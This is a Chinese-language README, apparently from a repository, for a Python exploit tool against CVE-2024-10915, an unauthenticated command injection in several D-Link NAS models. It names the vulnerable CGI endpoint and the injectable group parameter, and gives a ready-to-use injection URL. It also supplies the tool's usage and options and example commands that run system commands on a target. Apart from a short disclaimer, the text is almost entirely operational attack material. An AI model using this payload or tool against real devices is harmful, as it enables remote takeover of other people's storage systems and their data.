CVE-2024-10915 - D-Link NAS命令注入漏洞利用
此基于Python的漏洞利用工具针对多个D-Link NAS产品中通过/cgi-bin/account_mgr.cgi?cmd=cgi_user_add端点存在的命令注入漏洞。该漏洞允许未经身份验证的攻击者在受影响的设备上执行任意系统命令。
漏洞描述
CVE-2024-10915影响多个D-Link NAS型号。攻击者可以通过cgi_user_add命令中的group参数注入命令,导致远程代码执行。
受影响产品
- D-Link DNS-320
- D-Link DNS-320LW
- D-Link DNS-325
- D-Link DNS-340L
漏洞端点:/cgi-bin/account_mgr.cgi?cmd=cgi_user_add
示例:
1
|
http://192.168.1.100/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&group=';id;'
|
要求
安装所需依赖:
使用方法
1
|
usage: dlink_nas_rce_cve_2024_10915.py [-h] [-u URL] [-c COMMAND] [-p PROXY] [-o OUTPUT] [-l]
|
选项:
| 选项 |
描述 |
-u / --url |
目标基础URL(例如:http://192.168.1.100) |
-c / --command |
在设备上执行的命令(默认:id) |
-p / --proxy |
使用HTTP代理(例如:http://127.0.0.1:8080) |
-o / --output |
将HTTP响应保存到文件 |
-l / --list |
列出受影响的D-Link NAS产品 |
示例1
1
|
python3 dlink_nas_rce_cve_2024_10915.py -u "http://TARGET_IP" -c "id" -p "http://127.0.0.1:8080" -o results.txt
|

示例2
1
|
python3 dlink_nas_rce_cve_2024_10915.py -u "http://TARGET_IP" -c "uname" -p "http://127.0.0.1:8080" -o results.txt
|

示例3
1
|
python3 dlink_nas_rce_cve_2024_10915.py -u "http://TARGET_IP" -c "ifconfig" -p "http://127.0.0.1:8080" -o results.txt
|

⚠️ 免责声明
本项目仅用于教育和授权测试目的。
请勿在未经明确许可的网络或系统上使用此工具。
作者对任何误用或造成的损害不承担任何责任。